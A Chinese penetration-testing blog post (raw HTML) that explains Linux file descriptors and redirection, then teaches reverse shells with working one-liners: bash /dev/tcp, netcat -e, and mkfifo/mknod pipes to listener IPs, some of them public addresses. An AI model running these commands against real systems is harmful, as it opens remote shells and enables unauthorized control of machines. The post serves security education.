<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>0x09 - Web安全基础-Linux反弹shell | 晚上十一点睡觉のBlog</title><meta name="author" content="晚上十一点睡觉"><meta name="copyright" content="晚上十一点睡觉"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="Linux反弹shell Linux标准文件描述符文件描述符简介Linux系统将所有设备都当作文件来处理，而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符。 注意:  文件描述符是和每一个文件对应的！！！！！ 一个文件标识符表示一个文件，如0表示默认设备键盘"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://gungnir.top/posts/20558/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//hm.baidu.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><meta/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?60a7a67c81784f02b889a11753e4e8cc";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":true,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":150,"languages":{"author":"作者: 晚上十一点睡觉","link":"链接: ","source":"来源: 晚上十一点睡觉のBlog","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '0x09 - Web安全基础-Linux反弹shell',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-12-03 03:55:56'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.2.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208151640204.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">57</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">42</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);" rel="external nofollow noreferrer"><i class="fa-fw fa fa-heartbeat"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237560.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">晚上十一点睡觉のBlog</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);" rel="external nofollow noreferrer"><i class="fa-fw fa fa-heartbeat"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">0x09 - Web安全基础-Linux反弹shell</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-11-14T12:45:02.000Z" title="发表于 2022-11-14 20:45:02">2022-11-14</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-12-02T19:55:56.956Z" title="更新于 2022-12-03 03:55:56">2022-12-03</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/WEB%E5%AE%89%E5%85%A8/">WEB安全</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/WEB%E5%AE%89%E5%85%A8/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">命令执行</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">4.3k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>17分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="0x09 - Web安全基础-Linux反弹shell"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span><span class="post-meta-separator">|</span><span class="post-meta-commentcount"><i class="far fa-comments fa-fw post-meta-icon"></i><span class="post-meta-label">评论数:</span><a href="/posts/20558/#post-comment"><span id="twikoo-count"><i class="fa-solid fa-spinner fa-spin"></i></span></a></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>Linux反弹shell</p>
<h2 id="Linux标准文件描述符"><a href="#Linux标准文件描述符" class="headerlink" title="Linux标准文件描述符"></a>Linux标准文件描述符</h2><h3 id="文件描述符简介"><a href="#文件描述符简介" class="headerlink" title="文件描述符简介"></a>文件描述符简介</h3><p>Linux系统将所有设备都当作文件来处理，而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符。</p>
<p>注意:</p>
<ul>
<li>文件描述符是和每一个文件对应的！！！！！</li>
<li>一个文件标识符表示一个文件，如<code>0</code>表示默认设备键盘</li>
</ul>
<table>
<thead>
<tr>
<th>文件描述符</th>
<th>缩写</th>
<th>描述</th>
<th>默认设备</th>
</tr>
</thead>
<tbody><tr>
<td>0</td>
<td>STDIN</td>
<td>标准输入</td>
<td>默认设备键盘</td>
</tr>
<tr>
<td>1</td>
<td>STDOUT</td>
<td>标准输出</td>
<td>默认设备显示器</td>
</tr>
<tr>
<td>2</td>
<td>STDERR</td>
<td>标准错误输出</td>
<td>默认设备显示器</td>
</tr>
</tbody></table>
<p>我们与计算机之间的交互是我可以输入一些指令之后它给我一些输出。</p>
<ul>
<li>文件描述符<code>0</code>：理解为我和计算机交互时的<strong>输入</strong>，而这个输入默认是指向<strong>键盘</strong>的;</li>
<li>文件描述符<code>1</code>：理解为我和计算机交互时的<strong>输出</strong>，而这个输出默认是指向<strong>显示器</strong>的；</li>
<li>文件描述符<code>2</code>：理解为我和计算机交互时，计算机<strong>出现错误时的输出</strong>，而这个输出默认是和文件描述符1指向一个位置——<strong>显示器</strong>;</li>
</ul>
<p><strong>注意：</strong></p>
<ul>
<li><code>&gt;</code>表示输出，<code>&lt;</code>表示输入,前面加上数字表示某种<strong>重定向</strong>的方式。下面会讲到</li>
<li>在默认这条，<code>0，1，2</code>文件描述符对应这上面的三个输入或者输出设备。但是这种绑定关系是可以更改的。下面将更改数字<code>0，1，2</code>所对应的文件（即比如将1对应的默认输出设备显示器文件改为test输出）</li>
</ul>
<h3 id="更改标准输出的位置"><a href="#更改标准输出的位置" class="headerlink" title="更改标准输出的位置"></a>更改标准输出的位置</h3><ol>
<li>把标准输出位置更改到<code>test</code>文件中：</li>
</ol>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">exec 1&gt; test</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">此处1表示标准输出的意思</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">将标准输出重定向到<span class="built_in">test</span>的文件里，这个时候我们的终端不会显示出标准输出</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">在<span class="built_in">test</span>文件里我们可以查看到命令执行的结果</span></span><br></pre></td></tr></table></figure>

<ol start="2">
<li>把标准错误输出位置更改到<code>test</code>文件种：</li>
</ol>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">exec 2&gt; test</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>把当前标准输出重定向到<code>test</code>文件中：</li>
</ol>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">echo &#x27;lst&#x27; 1&gt; test</span><br><span class="line">cat test</span><br><span class="line">lst</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">同上，1&gt;表示将输出重定向给<span class="built_in">test</span></span></span><br></pre></td></tr></table></figure>

<h3 id="更改标准输入的位置"><a href="#更改标准输入的位置" class="headerlink" title="更改标准输入的位置"></a>更改标准输入的位置</h3><ol>
<li>从键盘输入，把输入写入<code>user</code>变量,用<code>read</code>命令</li>
</ol>
<p>即将输入的内容写入<code>user</code>这个变量<br>另外在<code>bash</code>中，用<code>$</code>加变量名，表示一个变量，如<code>$user</code></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">➜ ~ ➜  read user</span><br><span class="line">testtest</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">第一步是写入</span></span><br><span class="line">➜ ~ ➜  echo $user</span><br><span class="line">testtest</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>把test文件中的内容重定向到标准输入：</li>
</ol>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">➜ ~ ➜  read user 0&lt; test</span><br><span class="line">➜ ~ ➜  echo $user</span><br><span class="line">lst</span><br></pre></td></tr></table></figure>

<h3 id="分配自己的文件描述符"><a href="#分配自己的文件描述符" class="headerlink" title="分配自己的文件描述符"></a>分配自己的文件描述符</h3><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#分配文件描述符</span></span><br><span class="line">数字+&gt;+文件对象</span><br><span class="line">如  8&gt;temp</span><br><span class="line"><span class="comment">#即表示在分配自己的文件描述符，以后如果用`8&gt;`输出，就表示输出到自己的test文件了</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#使用自己定义的文件描述符</span></span><br><span class="line">&amp;+数字（也就是用&amp;+文件描述符）</span><br><span class="line">如   &amp;8</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">➜ ~ ➜  exec 5&gt; test   </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">数字+&gt;+文件对象，，，，即表示在分配自己的文件描述符，以后如果用5&gt;输出的就表示输出到自己的<span class="built_in">test</span>文件了</span></span><br><span class="line">➜ ~ ➜  echo &#x27;are you ok?&#x27; 1&gt;&amp;5</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">把文件描述符5指向<span class="built_in">test</span>文件，然后把当前输出重定向到文件描述符5</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">用&amp;引用文件描述符，即找到文件描述符指向的目标文件</span></span><br><span class="line">➜ ~ ➜  cat test</span><br><span class="line">are you ok?</span><br></pre></td></tr></table></figure>

<h3 id="dev-null"><a href="#dev-null" class="headerlink" title="/dev/null"></a><code>/dev/null</code></h3><p>特殊文件，写入的任何东西都会被清空。</p>
<p>用法：</p>
<ol>
<li>把标准错误输出重定向到&#x2F;dev&#x2F;null，从而丢掉不想保存的错误信息</li>
</ol>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="built_in">whoami</span> 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>快速移除文件中的数据而不用删除文件</li>
</ol>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cat</span> /dev/null &gt; <span class="built_in">test</span></span><br></pre></td></tr></table></figure>

<h2 id="重定向"><a href="#重定向" class="headerlink" title="重定向"></a>重定向</h2><blockquote>
<p>重定向是把输出定向到<strong>文件</strong>或者<strong>标准流</strong>。重定向输入输出本质上就是<strong>重定向文件描述符</strong>。</p>
</blockquote>
<ol>
<li>输入重定向</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">`&lt;`                    ——————从文件读取输入</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>输出重定向：</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&gt;	            ——————将输出保存到文件。</span><br><span class="line">&gt;&gt;    	 	    ——————将输出追加到文件。</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>管道</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">|                ——————将一个程序的输出作为输入发送到另一个程序。</span><br></pre></td></tr></table></figure>

<h2 id="反弹shell的本质"><a href="#反弹shell的本质" class="headerlink" title="反弹shell的本质"></a>反弹shell的本质</h2><h3 id="什么是反弹shell"><a href="#什么是反弹shell" class="headerlink" title="什么是反弹shell"></a>什么是反弹shell</h3><p>被控端主动发起连接请求去连接控制端（这是反向shell），通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。（这是正向shell的毛病）</p>
<p>再比如说一个常见例子：我们可以从内网访问外网的机器，但是无法从外网的机器访问内网。</p>
<p>所有我们需要反向shell也就是反弹shell，从被控端请求连接控制端，获取反弹shell</p>
<h4 id="被控端："><a href="#被控端：" class="headerlink" title="被控端："></a>被控端：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/10.10.1.11/6666 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p><strong>被控端</strong>命令参数解释：</p>
<ul>
<li><p><code>bash -i</code>：打开一个交互式的<code>bash shell</code>。（常见的<code>shell</code>还有<code>zsh</code>）</p>
</li>
<li><p>&#x2F;dev目录（只在bash下面才会有）：</p>
</li>
</ul>
<blockquote>
<p>&#x2F;dev&#x2F;tcp是Linux bash中的一个特殊设备（设备即文件），打开这个文件就相当于发起了一个<strong>socket调用</strong>，建立一个socket连接，读写这个文件就相当于在这个<strong>socket连接</strong>中传输数据。这个东西看不到但是可以用</p>
<p><code>/dev/tcp/10.10.1.11/6666</code>的作用便是和<code>10.10.1.11</code>的<code>6666</code>端口建立TCP连接，相当于搭建起来一个管道，通过给出不同参数可以发送或者接受数据</p>
</blockquote>
<ul>
<li><code>0&gt;&amp;1</code>：</li>
</ul>
<blockquote>
<p><code>0&gt;</code>表示由 <code>/dev/tcp/10.10.1.11/6666</code> 传递的数据作为交互式<code>shell</code>的输入，即从另一个机器发送来的数据，当作输入，输入的是标准的显示屏 即<code>&amp;1</code>指向的设备，此时被<code>shell</code>使用，即相当于接受远程发送来的命令，输出到被控机器的屏幕上被执行</p>
</blockquote>
<ul>
<li><code>bash -i &gt;&amp; /dev/tcp/10.10.1.11/6666</code>：</li>
</ul>
<blockquote>
<p><code>&gt;&amp;</code>、<code>&amp;&gt;</code> ：表示混合输出（正确、错误的输出都输出到一个地方）</p>
<p>所以该部分命令的意思是：bash命令执行后的结果通过管道输出到 <code>/dev/tcp/10.10.1.11/6666</code> 。    </p>
</blockquote>
<ul>
<li>实际上这个语句就是一个循环</li>
</ul>
<blockquote>
<ul>
<li>输出：<code>bash -i &gt;&amp; /dev/tcp/10.10.1.11/6666</code></li>
<li>输入：<code>/dev/tcp/10.10.1.11/6666 0&gt;&amp;1</code></li>
<li>这个命令就是一个输入输出集合到一起，输入输出的一个反复执行</li>
</ul>
</blockquote>
<h4 id="控制端："><a href="#控制端：" class="headerlink" title="控制端："></a>控制端：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">nc –lvvp 6666</span><br><span class="line"><span class="comment">#监听6666端口</span></span><br></pre></td></tr></table></figure>

<h3 id="实现控制端和被控端之间的交互（多种形式）"><a href="#实现控制端和被控端之间的交互（多种形式）" class="headerlink" title="实现控制端和被控端之间的交互（多种形式）"></a>实现控制端和被控端之间的交互（多种形式）</h3><blockquote>
<p>目的是，控制端输入，输入被传送到被控端执行，执行后将输出返回传送到控制端，显示出来</p>
</blockquote>
<h4 id="把被控端的交互式shell输出重定向到控制端："><a href="#把被控端的交互式shell输出重定向到控制端：" class="headerlink" title="把被控端的交互式shell输出重定向到控制端："></a>把被控端的交互式shell输出重定向到控制端：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">bash -i &gt; /dev/tcp/10.10.1.11/6666</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>bash -i</code>交互式终端执行后的而结果，返回到控制端。(<code>&gt;</code>重定向输出到控制端）</p>
<p>实际上是bash -i 1&gt; &#x2F;dev&#x2F;tcp&#x2F;10.10.1.11&#x2F;6666，但是省略了1，因为标准输出可以省略</p>
</blockquote>
<h4 id="把控制端的输入重定向到被控端的交互式shell："><a href="#把控制端的输入重定向到被控端的交互式shell：" class="headerlink" title="把控制端的输入重定向到被控端的交互式shell："></a>把控制端的输入重定向到被控端的交互式shell：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">bash -i &lt; /dev/tcp/10.10.1.11/6666</span><br></pre></td></tr></table></figure>

<h4 id="结合两条语句"><a href="#结合两条语句" class="headerlink" title="结合两条语句"></a>结合两条语句</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">bash -i &gt; /dev/tcp/10.10.1.11/6666 0&gt;&amp;1      </span><br></pre></td></tr></table></figure>

<blockquote>
<p>由 <code>/dev/tcp/10.10.1.11/6666</code> 传递的数据作为交互式<code>shell</code>的输入，命令执行后的结果输出到 <code>/dev/tcp/10.10.1.11/6666</code> 。</p>
<p>另外需要注意嗷，现在只显示正确的输出，error是不输出的！！</p>
</blockquote>
<h4 id="再添上错误输出，形成最终的反弹shell的命令"><a href="#再添上错误输出，形成最终的反弹shell的命令" class="headerlink" title="再添上错误输出，形成最终的反弹shell的命令"></a>再添上错误输出，形成最终的反弹shell的命令</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">bash -i &amp;&gt; /dev/tcp/10.10.1.11/6666 0&gt;&amp;1     </span><br><span class="line">bash -i &gt; /dev/tcp/10.10.1.11/6666 0&gt;&amp;1 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>\&gt;&amp;、&amp;&gt;</code> ：混合输出（正确、错误的输出都输出到一个地方）</p>
</blockquote>
<h2 id="不同方法反弹shell的命令"><a href="#不同方法反弹shell的命令" class="headerlink" title="不同方法反弹shell的命令"></a>不同方法反弹shell的命令</h2><h3 id="NC"><a href="#NC" class="headerlink" title="NC"></a>NC</h3><p>nc命令用于设置路由器，是网络工具中的瑞士军刀<br>nc命令全称<code>netcat</code>，用于设置路由器。它能通过 TCP 和 UDP 在网络中读写数据。通过与其他工具结合和重定向，你可以在脚本中以多种方式使用它。使用 netcat 命令所能完成的事情令人惊讶。</p>
<p>命令详解：</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">connect to somewhere:   nc [-options] hostname port[s] [ports] ...</span><br><span class="line">listen <span class="keyword">for</span> inbound:     nc -l -p port [options] [hostname] [port]</span><br><span class="line">options:</span><br><span class="line">        -g&lt;网关&gt; 设置路由器跃程通信网关，最多可设置8个。</span><br><span class="line">	    -G num          source-routing pointer: 4, 8, 12, ...</span><br><span class="line">        -l 使用监听模式，管控传入的资料。</span><br><span class="line">        -L              listen harder, re-listen on socket close </span><br><span class="line">        -n 直接使用IP地址，而不通过域名服务器。</span><br><span class="line">        -o&lt;输出文件&gt; 指定文件名称，把往来传输的流量数据以16进制字码倾倒成该文件保存。</span><br><span class="line">        -p&lt;通信端口&gt; 设置本地主机使用的通信端口。</span><br><span class="line">        -u 使用UDP传输协议。</span><br><span class="line">        -v 显示指令执行过程。更详细的信息。两次-v会有更多详细信息</span><br><span class="line">        -e 绑定某个程序，使用端口</span><br><span class="line">        -e prog         inbound program to <span class="built_in">exec</span> [dangerous!!]</span><br><span class="line">        -d              detach from console, background mode       </span><br><span class="line">        -h              this cruft</span><br><span class="line">        -i secs         delay interval <span class="keyword">for</span> lines sent, ports scanned          </span><br><span class="line">        -r              randomize <span class="built_in">local</span> and remote ports</span><br><span class="line">        -s addr         <span class="built_in">local</span> <span class="built_in">source</span> address</span><br><span class="line">        -t              answer TELNET negotiation</span><br><span class="line">        -w secs         <span class="built_in">timeout</span> <span class="keyword">for</span> connects and final net reads</span><br></pre></td></tr></table></figure>

<h4 id="NC正向Shell"><a href="#NC正向Shell" class="headerlink" title="NC正向Shell"></a>NC正向Shell</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#被控端：</span></span><br><span class="line">nc -lvvp 6666 -e /bin/sh</span><br><span class="line"><span class="comment">#也可以/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#控制端：</span></span><br><span class="line">nc 10.10.1.7 6666</span><br><span class="line"><span class="comment">#原  理：</span></span><br><span class="line"><span class="comment">#被控端使用nc将/bin/sh绑定到本地的6666端口，控制端主动连接被控端的6666端口，即可获得shell</span></span><br></pre></td></tr></table></figure>

<h4 id="NC反向Shell"><a href="#NC反向Shell" class="headerlink" title="NC反向Shell"></a>NC反向Shell</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#控制端：</span></span><br><span class="line">nc -lvvp 6666</span><br><span class="line"><span class="comment">#被控端：</span></span><br><span class="line">nc -e /bin/sh 10.10.1.11 6666</span><br><span class="line"><span class="comment">#原理：</span></span><br><span class="line"><span class="comment">#被控端使用nc将/bin/sh发送到控制端的6666端口，控制端只需要监听本地的6666端口，即可获得shell。</span></span><br></pre></td></tr></table></figure>

<img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211142153547.png" alt="image-20221114215316237" style="zoom:33%;" />

<h4 id="无-e-参数反弹shell"><a href="#无-e-参数反弹shell" class="headerlink" title="无 -e 参数反弹shell"></a>无 <code>-e</code> 参数反弹shell</h4><h5 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h5><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#被控端</span></span><br><span class="line"><span class="built_in">rm</span> /tmp/f;<span class="built_in">mkfifo</span> /tmp/f;<span class="built_in">cat</span> /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc 139.155.49.43 6666 &gt;/tmp/f</span><br><span class="line"><span class="comment">#控制端</span></span><br><span class="line">nc -lvvp 6666</span><br></pre></td></tr></table></figure>

<p>解释：</p>
<ul>
<li><p><code>mkfifo</code> 命令首先创建了一个管道，<code>cat</code> 将管道里面的内容输出传递给<code>/bin/sh</code>，<code>sh</code>会执行管道里的命令并将标准输出和标准错误输出结果通过<code>nc</code> 传到该管道，由此形成了一个回路。</p>
</li>
<li><p><code>rm /tmp/f;mkfifo /tmp/f;</code>       如果有 <code>/tmp/f</code>同名管道文件就先删除之，再创建一个 <code>/tmp/f</code></p>
</li>
<li><p><code>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc 139.155.49.43 6666 &gt;/tmp/f</code>  又是一个循环</p>
</li>
</ul>
<blockquote>
<ul>
<li><code>cat /tmp/f</code> 读取管道文件里的内容</li>
<li><code>2&gt;&amp;1</code>错误输出也重定向到标准输出</li>
<li><code>/bin/sh -i 2&gt;&amp;1 | nc 139.155.49.43 6666 &gt;/tmp/f</code> 前面执行的内容通过管道命令传输到后面进行执行，也就是前面bash的标准输出和错误输出都被<code>139.155.49.43 6666</code>接受并重定向输出到<code>/tmp/f</code> 文件</li>
</ul>
</blockquote>
<h5 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h5><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#被控端</span></span><br><span class="line"><span class="built_in">mknod</span> backpipe p; nc 47.101.214.85 6666 0&lt;backpipe | /bin/bash 1&gt;backpipe 2&gt;backpipe</span><br><span class="line"><span class="comment">#控制端</span></span><br><span class="line">nc -lvvp 6666</span><br></pre></td></tr></table></figure>

<blockquote>
<p>linux mkfifo命令：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.cnblogs.com/old-path-white-cloud/p/11685558.html">linux mkfifo命令基本用法 - 故道丶白云 - 博客园 (cnblogs.com)</a><br>Linux mknod 命令：创建字符设备文件和块设备文件</p>
</blockquote>
